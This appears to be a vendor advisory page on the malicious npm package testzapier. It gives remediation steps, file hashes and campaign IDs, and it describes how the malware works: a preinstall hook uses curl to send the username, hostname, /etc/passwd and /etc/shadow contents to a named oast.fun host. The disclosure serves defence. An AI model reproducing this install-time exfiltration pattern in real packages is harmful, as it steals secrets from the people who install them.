Which versions of testzapier are malicious?

The following npm versions of testzapier are flagged malicious: 1.0.0, 1.0.1. Treat any of these as compromised.

How do I remediate testzapier if I installed it?

Remove testzapier from your project and lockfile, then assume any secrets accessible to the build or runtime were exposed: rotate API keys, tokens, and credentials, and audit for unexpected outbound network activity or persistence. Use O3 Security's dependency scanner to confirm the package and its artifacts are fully purged across your stack.

Is testzapier part of a known attack campaign?

Yes — testzapier is associated with the IN-MAL-2026-005461, IN-MAL-2026-005460 campaign. Packages in the same campaign often share infrastructure and payloads, so check whether any related packages are also in your dependency tree.

Can O3 Security detect testzapier in my codebase?

Yes. O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, blocking testzapier and packages like it before any post-install script runs.

Malicious package

testzapiernpm

Malicious code in testzapier (npm) Remove it immediately and rotate any exposed credentials.

MAL-2026-5575

Immediate action

Remove the package, then rotate any secrets the build/runtime could reach.

npm uninstall testzapier

What this malware does

package.json declares a preinstall hook (node index.js) that fires automatically on npm install. index.js spawns a shell that runs curl -X POST against http://kpfdtycruuyszysbsjtoj9al6djfqrtve.oast.fun/noderedactedsdk/$(whoami)/$(hostname)/, embedding the installer's username and hostname in the URL path. The User-Agent header carries a base64-encoded blob containing the contents of /etc/passwd, /etc/hosts, /etc/shadow (when readable as root), and the output of id. The destination is an interactsh/oast.fun OOB-callback subdomain, plain HTTP, with no relationship to any documented package purpose. Installer harm is direct and unconditional: any machine running npm install testzapier leaks host identity and local-account/secret-file contents to the attacker.

Malicious versions

2 flagged

1.0.01.0.1

Indicators of compromise (SHA-256)

045f2a9515d6ea6e0d97f528486c1ed7ffb6626ae018c414b5842ba2db15fac1

a5840f2a3b34d7f32de7243a146ecf85ac875bd1ef09b0ba9a395d08e356084f

Frequently asked questions

No. testzapier on npm has been identified as a malicious package (versions 1.0.0, 1.0.1 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-005461IN-MAL-2026-005460

References

Credits

Amazon Inspector · finder

Scan your dependencies

O3 Security blocks malicious packages like this at install time and in CI.

Supply-chain protection